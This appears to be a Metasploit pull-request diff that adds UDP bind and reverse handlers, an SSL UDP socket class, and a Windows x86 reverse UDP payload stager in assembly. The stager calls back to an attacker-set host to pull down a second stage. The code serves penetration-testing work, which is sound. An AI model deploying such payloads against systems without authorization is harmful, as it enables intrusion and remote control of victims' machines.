### PR TITLE
Add UDP handlers and payloads

### DIFF
--- a/lib/msf/core/handler/bind_udp.rb
+++ b/lib/msf/core/handler/bind_udp.rb
@@ -1,0 +1,191 @@
+# -*- coding: binary -*-
+module Msf
+module Handler
+
+###
+#
+# This module implements the Bind TCP handler.  This means that
+# it will attempt to connect to a remote host on a given port for a period of
+# time (typically the duration of an exploit) to see if a the payload has
+# started listening.  This can tend to be rather verbose in terms of traffic
+# and in general it is preferable to use reverse payloads.
+#
+###
+module BindUdp
+
+  include Msf::Handler
+
+  #
+  # Returns the handler specific string representation, in this case
+  # 'bind_tcp'.
+  #
+  def self.handler_type
+    return "bind_udp"
+  end
+
+  #
+  # Returns the connection oriented general handler type, in this case bind.
+  #
+  def self.general_handler_type
+    "bind"
+  end
+
+  #
+  # Initializes a bind handler and adds the options common to all bind
+  # payloads, such as local port.
+  #
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        Opt::LPORT(4444),
+        OptAddress.new('RHOST', [false, 'The target address', '']),
+      ], Msf::Handler::BindUdp)
+
+    self.conn_threads = []
+    self.listener_threads = []
+    self.listener_pairs = {}
+  end
+
+  #
+  # Kills off the connection threads if there are any hanging around.
+  #
+  def cleanup_handler
+    # Kill any remaining handle_connection threads that might
+    # be hanging around
+    conn_threads.each { |thr|
+      thr.kill
+    }
+  end
+
+  #
+  # Starts a new connecting thread
+  #
+  def add_handler(opts={})
+
+    # Merge the updated datastore values
+    opts.each_pair do |k,v|
+      datastore[k] = v
+    end
+
+    # Start a new handler
+    start_handler
+  end
+
+  #
+  # Starts monitoring for an outbound connection to become established.
+  #
+  def start_handler
+
+    # Maximum number of seconds to run the handler
+    ctimeout = 150
+
+    if (exploit_config and exploit_config['active_timeout'])
+      ctimeout = exploit_config['active_timeout'].to_i
+    end
+
+    # Take a copy of the datastore options
+    rhost = datastore['RHOST']
+    lport = datastore['LPORT']
+
+    # Ignore this if one of the required options is missing
+    return if not rhost
+    return if not lport
+
+    # Only try the same host/port combination once
+    phash = rhost + ':' + lport.to_s
+    return if self.listener_pairs[phash]
+    self.listener_pairs[phash] = true
+
+    # Start a new handling thread
+    self.listener_threads << framework.threads.spawn("BindUdpHandlerListener-#{lport}", false) {
+      client = nil
+
+      print_status("Started bind handler")
+
+      if (rhost == nil)
+        raise ArgumentError,
+          "RHOST is not defined; bind stager cannot function.",
+          caller
+      end
+
+      stime = Time.now.to_i
+
+      while (stime + ctimeout > Time.now.to_i)
+        begin
+          client = Rex::Socket::Udp.create(
+            'PeerHost' => rhost,
+            'PeerPort' => lport.to_i,
+            'Proxies'  => datastore['Proxies'],
+            'Context'  =>
+              {
+                'Msf'        => framework,
+                'MsfPayload' => self,
+                'MsfExploit' => assoc_exploit
+              })
+        rescue Rex::ConnectionRefused
+          # Connection refused is a-okay
+        rescue ::Exception
+          wlog("Exception caught in bind handler: #{$!.class} #{$!}")
+        end
+
+        client.extend(Rex::IO::Stream)
+        break if client
+
+        # Wait a second before trying again
+        Rex::ThreadSafe.sleep(0.5)
+      end
+
+      # Valid client connection?
+      if (client)
+        # Increment the has connection counter
+        self.pending_connections += 1
+
+        # Timeout and datastore options need to be passed through to the client
+        opts = {
+          :datastore    => datastore,
+          :expiration   => datastore['SessionExpirationTimeout'].to_i,
+          :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
+          :retry_total  => datastore['SessionRetryTotal'].to_i,
+          :retry_wait   => datastore['SessionRetryWait'].to_i,
+          :udp_session  => true
+        }
+
+        # Start a new thread and pass the client connection
+        # as the input and output pipe.  Client's are expected
+        # to implement the Stream interface.
+        conn_threads << framework.threads.spawn("BindUdpHandlerSession", false, client) { |client_copy|
+          begin
+            handle_connection(client_copy, opts)
+          rescue
+            elog("Exception raised from BindUdp.handle_connection: #{$!}")
+          end
+        }
+      else
+        wlog("No connection received before the handler completed")
+      end
+    }
+  end
+
+  #
+  # Nothing to speak of.
+  #
+  def stop_handler
+    # Stop the listener threads
+    self.listener_threads.each do |t|
+      t.kill
+    end
+    self.listener_threads = []
+    self.listener_pairs = {}
+  end
+
+protected
+
+  attr_accessor :conn_threads # :nodoc:
+  attr_accessor :listener_threads # :nodoc:
+  attr_accessor :listener_pairs # :nodoc:
+end
+
+end
+end

--- a/lib/msf/core/handler/reverse_udp.rb
+++ b/lib/msf/core/handler/reverse_udp.rb
@@ -187,7 +187,7 @@ module ReverseUdp
             :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
             :retry_total  => datastore['SessionRetryTotal'].to_i,
             :retry_wait   => datastore['SessionRetryWait'].to_i,
-            :udp_inbound  => inbound
+            :udp_session  => inbound
           }
 
           if datastore['ReverseListenerThreaded']

--- a/lib/msf/core/handler/reverse_udp.rb
+++ b/lib/msf/core/handler/reverse_udp.rb
@@ -1,0 +1,263 @@
+# -*- coding: binary -*-
+require 'rex/socket'
+require 'thread'
+
+module Msf
+module Handler
+
+###
+#
+# This module implements the reverse TCP handler.  This means
+# that it listens on a port waiting for a connection until
+# either one is established or it is told to abort.
+#
+# This handler depends on having a local host and port to
+# listen on.
+#
+###
+module ReverseUdp
+
+  include Msf::Handler
+
+  #
+  # Returns the string representation of the handler type, in this case
+  # 'reverse_tcp'.
+  #
+  def self.handler_type
+    return "reverse_udp"
+  end
+
+  #
+  # Returns the connection-described general handler type, in this case
+  # 'reverse'.
+  #
+  def self.general_handler_type
+    "reverse"
+  end
+
+  #
+  # Initializes the reverse TCP handler and ads the options that are required
+  # for all reverse TCP payloads, like local host and local port.
+  #
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        Opt::LHOST,
+        Opt::LPORT(4444)
+      ], Msf::Handler::ReverseUdp)
+
+    # XXX: Not supported by all modules
+    register_advanced_options(
+      [
+        OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
+        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
+        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
+        OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
+        OptBool.new('ReverseListenerThreaded', [ true, 'Handle every connection in a new thread (experimental)', false])
+      ], Msf::Handler::ReverseUdp)
+
+    self.conn_threads = []
+  end
+
+  #
+  # Starts the listener but does not actually attempt
+  # to accept a connection.  Throws socket exceptions
+  # if it fails to start the listener.
+  #
+  def setup_handler
+    ex = false
+
+    comm = case datastore['ReverseListenerComm'].to_s
+      when "local"; ::Rex::Socket::Comm::Local
+      when /\A[0-9]+\Z/; framework.sessions[datastore['ReverseListenerComm'].to_i]
+      else; nil
+      end
+    unless comm.is_a? ::Rex::Socket::Comm
+      comm = nil
+    end
+
+    local_port = bind_port
+    addrs = bind_address
+
+    addrs.each { |ip|
+      begin
+
+        self.listener_sock = Rex::Socket::Udp.create(
+          'LocalHost' => ip,
+          'LocalPort' => local_port,
+          'Comm'      => comm,
+          'Context'   =>
+            {
+              'Msf'        => framework,
+              'MsfPayload' => self,
+              'MsfExploit' => assoc_exploit
+            })
+
+        ex = false
+
+        comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
+        comm_used = Rex::Socket::Comm::Local if comm_used == nil
+
+        if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
+          via = "via the #{comm_used.type} on session #{comm_used.sid}"
+        else
+          via = ""
+        end
+
+        print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
+        break
+      rescue
+        ex = $!
+        print_error("Handler failed to bind to #{ip}:#{local_port}")
+      end
+    }
+    raise ex if (ex)
+  end
+
+  #
+  # Closes the listener socket if one was created.
+  #
+  def cleanup_handler
+    stop_handler
+
+    # Kill any remaining handle_connection threads that might
+    # be hanging around
+    conn_threads.each { |thr|
+      thr.kill rescue nil
+    }
+  end
+
+  #
+  # Starts monitoring for an inbound connection.
+  #
+  def start_handler
+    queue = ::Queue.new
+
+    local_port = bind_port
+
+    self.listener_thread = framework.threads.spawn("ReverseUdpHandlerListener-#{local_port}", false, queue) { |lqueue|
+      loop do
+        # Accept a client connection
+        begin
+          inbound, peerhost, peerport = self.listener_sock.recvfrom
+          next if peerhost.nil?
+          cli_opts = {
+            'PeerPort' => peerport,
+            'PeerHost' => peerhost,
+            'LocalPort' => self.listener_sock.localport,
+            'Comm' => self.listener_sock.respond_to?(:comm) ? self.listener_sock.comm : nil
+          }
+
+          # unless ['::', '0.0.0.0'].any? {|alladdr| self.listener_sock.localhost == alladdr }
+          #   cli_opts['LocalHost'] = self.listener_sock.localhost
+          # end
+
+          client = Rex::Socket.create_udp(cli_opts)
+          if ! client
+            wlog("ReverseUdpHandlerListener-#{local_port}: No client received in call to accept, exiting...")
+            break
+          end
+
+          self.pending_connections += 1
+          lqueue.push([client,inbound])
+        rescue ::Exception
+          wlog("ReverseUdpHandlerListener-#{local_port}: Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
+          break
+        end
+      end
+    }
+
+    self.handler_thread = framework.threads.spawn("ReverseUdpHandlerWorker-#{local_port}", false, queue) { |cqueue|
+      loop do
+        begin
+          client, inbound = cqueue.pop
+
+          if ! client
+            elog("ReverseUdpHandlerWorker-#{local_port}: Queue returned an empty result, exiting...")
+            break
+          end
+
+          # Timeout and datastore options need to be passed through to the client
+          opts = {
+            :datastore    => datastore,
+            :expiration   => datastore['SessionExpirationTimeout'].to_i,
+            :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
+            :retry_total  => datastore['SessionRetryTotal'].to_i,
+            :retry_wait   => datastore['SessionRetryWait'].to_i,
+            :udp_inbound  => inbound
+          }
+
+          if datastore['ReverseListenerThreaded']
+            self.conn_threads << framework.threads.spawn("ReverseUdpHandlerSession-#{local_port}-#{client.peerhost}", false, client) { |client_copy|
+              handle_connection(client_copy, opts)
+            }
+          else
+            handle_connection(client, opts)
+          end
+        rescue ::Exception
+          elog("Exception raised from handle_connection: #{$!.class}: #{$!}\n\n#{$@.join("\n")}")
+        end
+      end
+    }
+
+  end
+
+  #
+  # Stops monitoring for an inbound connection.
+  #
+  def stop_handler
+    # Terminate the listener thread
+    if (self.listener_thread and self.listener_thread.alive? == true)
+      self.listener_thread.kill
+      self.listener_thread = nil
+    end
+
+    # Terminate the handler thread
+    if (self.handler_thread and self.handler_thread.alive? == true)
+      self.handler_thread.kill
+      self.handler_thread = nil
+    end
+
+    if (self.listener_sock)
+      self.listener_sock.close
+      self.listener_sock = nil
+    end
+  end
+
+protected
+
+  def bind_port
+    port = datastore['ReverseListenerBindPort'].to_i
+    port > 0 ? port : datastore['LPORT'].to_i
+  end
+
+  def bind_address
+    # Switch to IPv6 ANY address if the LHOST is also IPv6
+    addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
+    # First attempt to bind LHOST. If that fails, the user probably has
+    # something else listening on that interface. Try again with ANY_ADDR.
+    any = (addr.length == 4) ? "0.0.0.0" : "::0"
+
+    addrs = [ Rex::Socket.addr_ntoa(addr), any  ]
+
+    if not datastore['ReverseListenerBindAddress'].to_s.empty?
+      # Only try to bind to this specific interface
+      addrs = [ datastore['ReverseListenerBindAddress'] ]
+
+      # Pick the right "any" address if either wildcard is used
+      addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
+    end
+
+    addrs
+  end
+
+  attr_accessor :listener_sock # :nodoc:
+  attr_accessor :listener_thread # :nodoc:
+  attr_accessor :handler_thread # :nodoc:
+  attr_accessor :conn_threads # :nodoc:
+end
+
+end
+end

--- a/lib/msf/core/handler/reverse_udp.rb
+++ b/lib/msf/core/handler/reverse_udp.rb
@@ -155,6 +155,7 @@ module ReverseUdp
           # end
 
           client = Rex::Socket.create_udp(cli_opts)
+          client.extend(Rex::IO::Stream)
           if ! client
             wlog("ReverseUdpHandlerListener-#{local_port}: No client received in call to accept, exiting...")
             break

--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -16,8 +16,8 @@ module Msf::Payload::TransportConfig
     config
   end
 
-  def transport_config_reverse_udp(upts={})
-    config =transport_config_reverse_tcp(opts)
+  def transport_config_reverse_udp(opts={})
+    config = transport_config_reverse_tcp(opts)
     config[:scheme] = 'udp'
     config
   end

--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -16,6 +16,12 @@ module Msf::Payload::TransportConfig
     config
   end
 
+  def transport_config_reverse_udp(upts={})
+    config =transport_config_reverse_tcp(opts)
+    config[:scheme] = 'udp'
+    config
+  end
+
   def transport_config_reverse_ipv6_tcp(opts={})
     config = transport_config_reverse_tcp(opts)
     config[:scheme] = 'tcp6'

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -65,6 +65,7 @@ module Payload::Windows::ReverseTcp
       start:
         pop ebp
       #{asm_reverse_tcp(opts)}
+      #{asm_block_recv(opts)}
     ^
     Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
   end
@@ -93,12 +94,11 @@ module Payload::Windows::ReverseTcp
   #
   # @option opts [Fixnum] :port The port to connect to
   # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
-  # @option opts [Bool] :reliable Whether or not to enable error handling code
+  # @option opts [Fixnum] :retry_count Number of retry attempts
   #
   def asm_reverse_tcp(opts={})
 
     retry_count  = [opts[:retry_count].to_i, 1].max
-    reliable     = opts[:reliable]
     encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
     encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
 
@@ -125,8 +125,8 @@ module Payload::Windows::ReverseTcp
         push #{retry_count}     ; retry counter
 
       create_socket:
-        push #{encoded_host}    ; host in little-endian format
-        push #{encoded_port}    ; family AF_INET and port number
+        push #{encoded_host}    ; host in little-endian format - #{opts[:host]}
+        push #{encoded_port}    ; family AF_INET and port number - #{opts[:port]}
         mov esi, esp            ; save pointer to sockaddr struct
 
         push eax                ; if we succeed, eax will be zero, push zero for the flags param.
@@ -178,7 +178,17 @@ module Payload::Windows::ReverseTcp
 
     asm << asm_send_uuid if include_send_uuid
 
-    asm << %Q^
+    asm
+  end
+
+  #
+  # Generate an assembly stub with the configured feature set and options.
+  #
+  # @option opts [Bool] :reliable Whether or not to enable error handling code
+  #
+  def asm_block_recv(opts={})
+    reliable     = opts[:reliable]
+    asm = %Q^
       recv:
         ; Receive the size of the incoming second stage...
         push 0                  ; flags

--- a/lib/msf/core/payload/windows/reverse_udp.rb
+++ b/lib/msf/core/payload/windows/reverse_udp.rb
@@ -3,13 +3,12 @@
 require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/windows/reverse_tcp'
-require 'msf/core/payload/windows/rc4'
 
 module Msf
 
 ###
 #
-# Complex reverse_tcp_rc4 payload generation for Windows ARCH_X86
+# Complex reverse_udp payload generation for Windows ARCH_X86
 #
 ###
 

--- a/lib/msf/core/payload/windows/reverse_udp.rb
+++ b/lib/msf/core/payload/windows/reverse_udp.rb
@@ -160,7 +160,7 @@ module Payload::Windows::ReverseUdp
       send_newline:
         push 0                 ; flags
         push #{newline.length} ; length of the newline
-        call get_nl_address    ; put uuid buffer on the stack
+        call get_nl_address    ; put newline buffer on the stack
         db #{newline}          ; newline
       get_nl_address:
         push edi               ; saved socket

--- a/lib/msf/core/payload/windows/reverse_udp.rb
+++ b/lib/msf/core/payload/windows/reverse_udp.rb
@@ -1,0 +1,176 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/windows/reverse_tcp'
+require 'msf/core/payload/windows/rc4'
+
+module Msf
+
+###
+#
+# Complex reverse_tcp_rc4 payload generation for Windows ARCH_X86
+#
+###
+
+module Payload::Windows::ReverseUdp
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Windows::ReverseTcp
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    conf = {
+      port:        datastore['LPORT'],
+      host:        datastore['LHOST'],
+      retry_count: datastore['ReverseConnectRetries'],
+      reliable:    false
+    }
+
+    # Generate the advanced stager if we have space
+    unless self.available_space.nil? || required_space > self.available_space
+      conf[:exitfunk] = datastore['EXITFUNC']
+      conf[:reliable] = true
+    end
+
+    generate_reverse_udp(conf)
+  end
+
+  def transport_config(opts={})
+    transport_config_reverse_udp(opts)
+  end
+
+  #
+  # Generate and compile the stager
+  #
+  def generate_reverse_udp(opts={})
+    combined_asm = %Q^
+      cld                    ; Clear the direction flag.
+      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+      #{asm_block_api}
+      start:
+        pop ebp
+      #{asm_reverse_udp(opts)}
+      #{asm_block_recv(opts)}
+    ^
+    Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
+  end
+
+  #
+  # Generate an assembly stub with the configured feature set and options.
+  #
+  # @option opts [Fixnum] :port The port to connect to
+  # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
+  # @option opts [Fixnum] :retry_count Number of retry attempts
+  #
+  def asm_reverse_udp(opts={})
+
+    retry_count  = [opts[:retry_count].to_i, 1].max
+    encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
+    encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
+
+    asm = %Q^
+      ; Input: EBP must be the address of 'api_call'.
+      ; Output: EDI will be the socket for the connection to the server
+      ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+      reverse_udp:
+        push '32'               ; Push the bytes 'ws2_32',0,0 onto the stack.
+        push 'ws2_'             ; ...
+        push esp                ; Push a pointer to the "ws2_32" string on the stack.
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        call ebp                ; LoadLibraryA( "ws2_32" )
+
+        mov eax, 0x0190         ; EAX = sizeof( struct WSAData )
+        sub esp, eax            ; alloc some space for the WSAData structure
+        push esp                ; push a pointer to this stuct
+        push eax                ; push the wVersionRequested parameter
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        call ebp                ; WSAStartup( 0x0190, &WSAData );
+
+      set_address:
+        push #{retry_count}     ; retry counter
+
+      create_socket:
+        push #{encoded_host}    ; host in little-endian format - #{opts[:host]}
+        push #{encoded_port}    ; family AF_INET and port number - #{opts[:port]}
+        mov esi, esp            ; save pointer to sockaddr struct
+
+        push eax                ; if we succeed, eax will be zero, push zero for the flags param.
+        push eax                ; push null for reserved parameter
+        push eax                ; we do not specify a WSAPROTOCOL_INFO structure
+        push eax                ; we do not specify a protocol
+        inc eax                 ;
+        inc eax                 ;
+        push eax                ; push SOCK_DGRAM
+        push eax                ; push AF_INET
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        call ebp                ; WSASocketA( AF_INET, SOCK_DGRAM, 0, 0, 0, 0 );
+        xchg edi, eax           ; save the socket for later, don't care about the value of eax after this
+
+      try_connect:
+        push 16                 ; length of the sockaddr struct
+        push esi                ; pointer to the sockaddr struct
+        push edi                ; the socket
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+        call ebp                ; connect( s, &sockaddr, 16 );
+
+        test eax,eax            ; non-zero means a failure
+        jz connected
+
+      handle_connect_failure:
+        ; decrement our attempt count and try again
+        dec [esi+8]
+        jnz try_connect
+    ^
+
+    if opts[:exitfunk]
+      asm << %Q^
+      failure:
+        call exitfunk
+      ^
+    else
+      asm << %Q^
+      failure:
+        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        call ebp
+      ^
+    end
+
+    asm << %Q^
+      ; this  lable is required so that reconnect attempts include
+      ; the UUID stuff if required.
+      connected:
+    ^
+
+    # UDP receivers need to read something from the new socket
+    if include_send_uuid
+      asm << asm_send_uuid
+    else
+      asm << asm_send_newline
+    end
+
+    asm
+  end
+
+  def asm_send_newline
+    newline = raw_to_db "\n"
+    asm =%Q^
+      send_newline:
+        push 0                 ; flags
+        push #{newline.length} ; length of the newline
+        call get_nl_address    ; put uuid buffer on the stack
+        db #{newline}          ; newline
+      get_nl_address:
+        push edi               ; saved socket
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+        call ebp               ; call send
+    ^
+    asm
+  end
+
+end
+
+end

--- a/lib/msf/core/session/interactive.rb
+++ b/lib/msf/core/session/interactive.rb
@@ -26,7 +26,8 @@ module Interactive
     # A nil is passed in the case of non-stream interactive sessions (Meterpreter)
     if rstream
       self.rstream = rstream
-      self.ring    = Rex::IO::RingBuffer.new(rstream, {:size => opts[:ring_size] || 100 })
+      klass = opts[:udp_inbound] ? Rex::IO::RingBufferUdp : Rex::IO::RingBuffer
+      self.ring    = klass.new(rstream, {:size => opts[:ring_size] || 100 })
     end
     super()
   end
@@ -151,4 +152,3 @@ end
 
 end
 end
-

--- a/lib/msf/core/session/interactive.rb
+++ b/lib/msf/core/session/interactive.rb
@@ -26,7 +26,7 @@ module Interactive
     # A nil is passed in the case of non-stream interactive sessions (Meterpreter)
     if rstream
       self.rstream = rstream
-      klass = opts[:udp_inbound] ? Rex::IO::RingBufferUdp : Rex::IO::RingBuffer
+      klass = opts[:udp_session] ? Rex::IO::RingBufferUdp : Rex::IO::RingBuffer
       self.ring    = klass.new(rstream, {:size => opts[:ring_size] || 100 })
     end
     super()

--- a/lib/rex/io/ring_buffer.rb
+++ b/lib/rex/io/ring_buffer.rb
@@ -285,6 +285,32 @@ class RingBuffer
 
 end
 
+class RingBufferUdp < RingBuffer
+
+  #
+  # The built-in monitor thread (normally unused with Metasploit)
+  #
+  def monitor_thread
+    Thread.new do
+      begin
+      while self.fd
+        begin
+          buff = self.fd.recvfrom_nonblock(1.0)
+        rescue  IO::WaitReadable
+          # IO.select([self.fd])
+          next
+        end
+        next if not buff
+        store_data(buff)
+      end
+      rescue ::Exception => e
+        self.monitor_thread_error = e
+      end
+    end
+  end
+
+end
+
 end
 end
 
@@ -365,5 +391,3 @@ c = r.create_stream
 p c.read
 
 =end
-
-

--- a/lib/rex/socket.rb
+++ b/lib/rex/socket.rb
@@ -744,6 +744,24 @@ module Socket
   end
 
   #
+  # Returns peer information (host + port) in host:port format.
+  #
+  def peerinfo
+    if (pi = getpeername)
+      return pi[1] + ':' + pi[2].to_s
+    end
+  end
+
+  #
+  # Returns local information (host + port) in host:port format.
+  #
+  def localinfo
+    if (pi = getlocalname)
+      return pi[1] + ':' + pi[2].to_s
+    end
+  end
+
+  #
   # Returns a string that indicates the type of the socket, such as 'tcp'.
   #
   def type?

--- a/lib/rex/socket/comm/local.rb
+++ b/lib/rex/socket/comm/local.rb
@@ -5,6 +5,7 @@ require 'rex/socket/tcp'
 require 'rex/socket/ssl_tcp'
 require 'rex/socket/ssl_tcp_server'
 require 'rex/socket/udp'
+require 'rex/socket/ssl_udp'
 require 'rex/socket/ip'
 require 'timeout'
 
@@ -314,12 +315,11 @@ class Rex::Socket::Comm::Local
         case param.proto
           when 'tcp'
             klass = Rex::Socket::Tcp
-            sock.extend(klass)
-            sock.initsock(param)
           when 'udp'
-            sock.extend(Rex::Socket::Udp)
-            sock.initsock(param)
+            klass = Rex::Socket::Udp
         end
+        sock.extend(klass)
+        sock.initsock(param)
       end
 
       if chain.size > 1
@@ -334,7 +334,12 @@ class Rex::Socket::Comm::Local
 
       # Now extend the socket with SSL and perform the handshake
       if(param.bare? == false and param.ssl)
-        klass = Rex::Socket::SslTcp
+        case param.proto
+          when 'tcp'
+            klass = Rex::Socket::Tcp
+          when 'udp'
+            klass = Rex::Socket::Udp
+        end
         sock.extend(klass)
         sock.initsock(param)
       end

--- a/lib/rex/socket/comm/local.rb
+++ b/lib/rex/socket/comm/local.rb
@@ -133,7 +133,7 @@ class Rex::Socket::Comm::Local
         # FreeBSD allows IPv6 socket creation, but throws an error on sendto()
         # Windows 7 SP1 and newer also fail to sendto with IPv6 udp sockets
         unless Rex::Compat.is_freebsd or Rex::Compat.is_windows
-          usev6 = true
+          # usev6 = true
         end
       end
 

--- a/lib/rex/socket/ssl_udp.rb
+++ b/lib/rex/socket/ssl_udp.rb
@@ -1,0 +1,368 @@
+# -*- coding: binary -*-
+require 'rex/socket'
+###
+#
+# This class provides methods for interacting with an SSL UDP client
+# connection.
+#
+###
+module Rex::Socket::SslUdp
+
+begin
+  @@loaded_openssl = false
+
+  begin
+    require 'openssl'
+    @@loaded_openssl = true
+    require 'openssl/nonblock'
+  rescue ::Exception
+  end
+
+
+  include Rex::Socket::Udp
+
+  ##
+  #
+  # Factory
+  #
+  ##
+
+  #
+  # Creates an SSL UDP instance.
+  #
+  def self.create(hash = {})
+    raise RuntimeError, "No OpenSSL support" if not @@loaded_openssl
+    hash['SSL'] = true
+    self.create_param(Rex::Socket::Parameters.from_hash(hash))
+  end
+
+  #
+  # Set the SSL flag to true and call the base class's create_param routine.
+  #
+  def self.create_param(param)
+    param.ssl   = true
+    Rex::Socket::Udp.create_param(param)
+  end
+
+  ##
+  #
+  # Class initialization
+  #
+  ##
+
+  #
+  # Initializes the SSL socket.
+  #
+  def initsock(params = nil)
+    super
+
+    # Default to SSLv23 (automatically negotiate)
+    version = :SSLv23
+
+    # Let the caller specify a particular SSL/TLS version
+    if params
+      case params.ssl_version
+      when 'SSL2', :SSLv2
+        version = :SSLv2
+      when 'SSL23', :SSLv23
+        version = :SSLv23
+      when 'SSL3', :SSLv3
+        version = :SSLv3
+      when 'TLS1','TLS1.0', :TLSv1
+        version = :TLSv1
+      when 'TLS1.1', :TLSv1_1
+        version = :TLSv1_1
+      when 'TLS1.2', :TLSv1_2
+        version = :TLSv1_2
+      end
+    end
+
+    # Raise an error if no selected versions are supported
+    if ! OpenSSL::SSL::SSLContext::METHODS.include? version
+      raise ArgumentError, 'The system OpenSSL does not support the requested SSL/TLS version'
+    end
+
+    # Try intializing the socket with this SSL/TLS version
+    # This will throw an exception if it fails
+    initsock_with_ssl_version(params, version)
+
+    # Track the SSL version
+    self.ssl_negotiated_version = version
+  end
+
+  def initsock_with_ssl_version(params, version)
+    # Build the SSL connection
+    self.sslctx  = OpenSSL::SSL::SSLContext.new(version)
+
+    # Configure the SSL context
+    # TODO: Allow the user to specify the verify mode callback
+    # Valid modes:
+    #  VERIFY_CLIENT_ONCE
+    #  VERIFY_FAIL_IF_NO_PEER_CERT
+    #  VERIFY_NONE
+    #  VERIFY_PEER
+    if params.ssl_verify_mode
+      self.sslctx.verify_mode = OpenSSL::SSL.const_get("VERIFY_#{params.ssl_verify_mode}".intern)
+    else
+      # Could also do this as graceful faildown in case a passed verify_mode is not supported
+      self.sslctx.verify_mode = OpenSSL::SSL::VERIFY_PEER
+    end
+
+    self.sslctx.options = OpenSSL::SSL::OP_ALL
+
+    if params.ssl_cipher
+      self.sslctx.ciphers = params.ssl_cipher
+    end
+
+    # Set the verification callback
+    self.sslctx.verify_callback = Proc.new do |valid, store|
+      self.peer_verified = valid
+      true
+    end
+
+    # Tie the context to a socket
+    self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx)
+
+    # Force a negotiation timeout
+    begin
+    Timeout.timeout(params.timeout) do
+      if not allow_nonblock?
+        self.sslsock.connect
+      else
+        begin
+          self.sslsock.connect_nonblock
+        # Ruby 1.8.7 and 1.9.0/1.9.1 uses a standard Errno
+        rescue ::Errno::EAGAIN, ::Errno::EWOULDBLOCK
+            IO::select(nil, nil, nil, 0.10)
+            retry
+
+        # Ruby 1.9.2+ uses IO::WaitReadable/IO::WaitWritable
+        rescue ::Exception => e
+          if ::IO.const_defined?('WaitReadable') and e.kind_of?(::IO::WaitReadable)
+            IO::select( [ self.sslsock ], nil, nil, 0.10 )
+            retry
+          end
+
+          if ::IO.const_defined?('WaitWritable') and e.kind_of?(::IO::WaitWritable)
+            IO::select( nil, [ self.sslsock ], nil, 0.10 )
+            retry
+          end
+
+          raise e
+        end
+      end
+    end
+
+    rescue ::Timeout::Error
+      raise Rex::ConnectionTimeout.new(params.peerhost, params.peerport)
+    end
+  end
+
+  ##
+  #
+  # Stream mixin implementations
+  #
+  ##
+
+  #
+  # Writes data over the SSL socket.
+  #
+  def write(buf, opts = {})
+    return sslsock.write(buf) if not allow_nonblock?
+
+    total_sent   = 0
+    total_length = buf.length
+    block_size   = 16384
+    retry_time   = 0.5
+
+    begin
+      while( total_sent < total_length )
+        s = Rex::ThreadSafe.select( nil, [ self.sslsock ], nil, 0.25 )
+        if( s == nil || s[0] == nil )
+          next
+        end
+        data = buf[total_sent, block_size]
+        sent = sslsock.write_nonblock( data )
+        if sent > 0
+          total_sent += sent
+        end
+      end
+
+    rescue ::IOError, ::Errno::EPIPE
+      return nil
+
+    # Ruby 1.8.7 and 1.9.0/1.9.1 uses a standard Errno
+    rescue ::Errno::EAGAIN, ::Errno::EWOULDBLOCK
+      # Sleep for a half a second, or until we can write again
+      Rex::ThreadSafe.select( nil, [ self.sslsock ], nil, retry_time )
+      # Decrement the block size to handle full sendQs better
+      block_size = 1024
+      # Try to write the data again
+      retry
+
+    # Ruby 1.9.2+ uses IO::WaitReadable/IO::WaitWritable
+    rescue ::Exception => e
+      if ::IO.const_defined?('WaitReadable') and e.kind_of?(::IO::WaitReadable)
+        IO::select( [ self.sslsock ], nil, nil, retry_time )
+        retry
+      end
+
+      if ::IO.const_defined?('WaitWritable') and e.kind_of?(::IO::WaitWritable)
+        IO::select( nil, [ self.sslsock ], nil, retry_time )
+        retry
+      end
+
+      # Another form of SSL error, this is always fatal
+      if e.kind_of?(::OpenSSL::SSL::SSLError)
+        return nil
+      end
+
+      # Bubble the event up to the caller otherwise
+      raise e
+    end
+
+    total_sent
+  end
+
+  #
+  # Reads data from the SSL socket.
+  #
